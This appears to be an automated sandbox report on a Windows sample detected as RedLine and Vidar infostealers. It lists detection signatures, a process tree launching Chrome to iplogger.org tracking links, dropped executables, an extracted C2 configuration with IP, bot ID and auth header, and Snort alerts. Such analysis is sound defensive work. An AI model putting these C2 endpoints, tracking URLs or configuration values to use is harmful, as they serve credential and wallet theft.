Edit tour
Windows
Analysis Report
60MLnq8Uma.exe
Overview
General Information
Detection
RedLine, Vidar
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Yara detected Generic Downloader
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- 60MLnq8Uma.exe (PID: 5156 cmdline:
"C:\Users\ user\Deskt op\60MLnq8 Uma.exe" MD5: FFBA715730CDB446FA832C8FCAA4F783) - chrome.exe (PID: 1784 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1R yjC4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 1560 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1452,11475 4401898261 78966,1756 7793588229 146751,131 072 --lang =en-GB --s ervice-san dbox-type= network -- enable-aud io-service -sandbox - -mojo-plat form-chann el-handle= 1928 /pref etch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 4432 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1A 4aK4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 1144 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1568,78571 1505115495 7405,27977 3322403850 6213,13107 2 --lang=e n-GB --ser vice-sandb ox-type=ne twork --en able-audio -service-s andbox --m ojo-platfo rm-channel -handle=18 48 /prefet ch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 5168 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1R LtX4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 6300 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1548,51302 8598303560 1959,15719 3073428922 92670,1310 72 --lang= en-GB --se rvice-sand box-type=n etwork --e nable-audi o-service- sandbox -- mojo-platf orm-channe l-handle=1 872 /prefe tch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 2924 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1R CgX4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 4640 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1516,89588 1465136835 9877,14887 8155277894 0000,13107 2 --lang=e n-GB --ser vice-sandb ox-type=ne twork --en able-audio -service-s andbox --m ojo-platfo rm-channel -handle=18 68 /prefet ch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 2344 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1n fDK4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 7284 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1628,75940 2564325878 8469,10261 3029251661 73582,1310 72 --lang= en-GB --se rvice-sand box-type=n etwork --e nable-audi o-service- sandbox -- mojo-platf orm-channe l-handle=1 868 /prefe tch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 6764 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed -- "htt ps://iplog ger.org/1A btZ4 MD5: C139654B5C1438A95B321BB01AD63EF6) - chrome.exe (PID: 7388 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -field-tri al-handle= 1632,66152 2515779270 2950,16112 0844079479 95520,1310 72 --lang= en-GB --se rvice-sand box-type=n etwork --e nable-audi o-service- sandbox -- mojo-platf orm-channe l-handle=1 968 /prefe tch:8 MD5: C139654B5C1438A95B321BB01AD63EF6) - namdoitntn.exe (PID: 7164 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\namdoit ntn.exe" MD5: B16134159E66A72FB36D93BC703B4188) - real.exe (PID: 5220 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\real.ex e" MD5: 84D016C5A9E810C2EF08767805A87589) - safert44.exe (PID: 7456 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\safert4 4.exe" MD5: DBE947674EA388B565AE135A09CC6638) - kukurzka9000.exe (PID: 7540 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\kukurzk a9000.exe" MD5: 5412966383390AAB13F3D06D8B942AB5) - F0geI.exe (PID: 7664 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\F0geI.e xe" MD5: 8D24DA259CD54DB3EDE2745724DBEDAB) - tag.exe (PID: 7692 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\tag.exe " MD5: 2EBC22860C7D9D308C018F0FFB5116FF) - EU1.exe (PID: 7720 cmdline:
"C:\Progra m Files (x 86)\Compan y\NewProdu ct\EU1.exe " MD5: 98EE616BBBDAE32BD744F31D48E46C72)
- cleanup
{"C2 url": ["62.204.41.144:14096"], "Bot Id": "@tag12312341", "Authorization Header": "71466795417275fac01979e57016e277"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
| |
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
| |
Windows_Trojan_Vidar_114258d5 | unknown | unknown |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 25 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
Click to see the 22 entries |
⊘No Sigma rule has matched
Timestamp: | 192.168.2.462.204.41.14449923140962850286 08/05/22-14:34:23.916434 |
SID: | 2850286 |
Source Port: | 49923 |
Destination Port: | 14096 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.445.95.11.15849933802036934 08/05/22-14:34:25.840824 |
SID: | 2036934 |
Source Port: | 49933 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.431.41.244.13449916116432850286 08/05/22-14:34:24.803289 |
SID: | 2850286 |
Source Port: | 49916 |
Destination Port: | 11643 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4103.89.90.6149846187282850286 08/05/22-14:34:24.042900 |
SID: | 2850286 |
Source Port: | 49846 |
Destination Port: | 18728 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 31.41.244.134192.168.2.411643499162850353 08/05/22-14:34:14.261317 |
SID: | 2850353 |
Source Port: | 11643 |
Destination Port: | 49916 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.462.204.41.14449923140962850027 08/05/22-14:34:14.202307 |
SID: | 2850027 |
Source Port: | 49923 |
Destination Port: | 14096 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4103.89.90.6149846187282850027 08/05/22-14:33:12.660021 |
SID: | 2850027 |
Source Port: | 49846 |
Destination Port: | 18728 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 62.204.41.144192.168.2.414096499232850353 08/05/22-14:34:14.364490 |
SID: | 2850353 |
Source Port: | 14096 |
Destination Port: | 49923 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.431.41.244.13449916116432850027 08/05/22-14:34:14.097038 |
SID: | 2850027 |
Source Port: | 49916 |
Destination Port: | 11643 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 45.95.11.158192.168.2.480499332036955 08/05/22-14:34:26.057532 |
SID: | 2036955 |
Source Port: | 80 |
Destination Port: | 49933 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 103.89.90.61192.168.2.418728498462850353 08/05/22-14:33:28.712091 |
SID: | 2850353 |
Source Port: | 18728 |
Destination Port: | 49846 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: | |||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |